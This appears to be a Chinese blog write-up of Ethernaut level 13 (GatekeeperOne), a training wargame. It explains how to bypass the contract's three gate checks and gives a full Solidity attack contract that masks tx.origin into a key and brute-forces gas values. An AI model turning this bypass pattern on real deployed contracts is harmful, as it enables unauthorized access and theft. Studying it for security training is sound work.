# 智能合约黑客攻击 Ethernaut:  
 13. GatekeeperOne

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-28
**URL:** https://paragraph.com/@leekdev/ethernaut-13-gatekeeperone

## Content

Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目把 entrant 变量的地址改为自己。Hack思路需要调 enter 方法，而且得通过3个装饰器的检查。gateOne 第一个检查 msg.sender != tx.origin 只要用另外一个合约转一下就可以通过gateTwo 需要满足一个特殊剩余 gas , 可以粗暴的循环尝试gateThree 满足一个特殊的 keygateThree 通过条件：// 0x 0000 0000 1111 [1111] == 0x 0000 0000 0000 [1111] 括号里的值相等 uint32(uint64(_gateKey)) == uint16(uint64(_gateKey) // 0x 0000 0000 [0000 0000] == 0x 0000 0000 [0000 0000] 括号里的值不相等 uint32(uint64(_gateKey)) != uint64(_gateKey) // 0x 0000 0000 0000 [0000] == 0x 0000 0000 0000 [0000] 括号里的值和玩家地址相等 uint32(uint64(_gateKey)) == uint16(uint160(tx.origin) // 最终舒输入 // tx.origin && 0x FFFF FFFF 0000 FFFF // 0x 89D342ac29e7f2BF57382E2190a69976 [0000] 5c31 括号里的变0，其他随意 攻击代码interface IGatekeeperOne { function enter(bytes8 _gateKey) external returns (bool); } contract GatekeeperOneHack { IGatekeeperOne public exploitInst; constructor(address _target) { exploitInst = IGatekeeperOne(_target); } function attack() public payable { bytes8 _gateKey = bytes8(uint64(uint160(address(tx.origin)))) & 0xFFFFFFFF0000FFFF; uint256 modNum = 8191; uint256 gasToUse = 800_000; for (uint256 i = 0; i <= modNum; i++) { try exploitInst.enter{ gas: gasToUse + i }(bytes8(_gateKey)) { // success break; } catch { // fail ... } } } } Hack案例…防范思路…参考资料….

## Publication Information

- [Leek DEV](https://paragraph.com/@leekdev/): Publication homepage
- [All Posts](https://paragraph.com/@leekdev/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@leekdev): Subscribe to updates
- [Twitter](https://twitter.com/LeekDEV): Follow on Twitter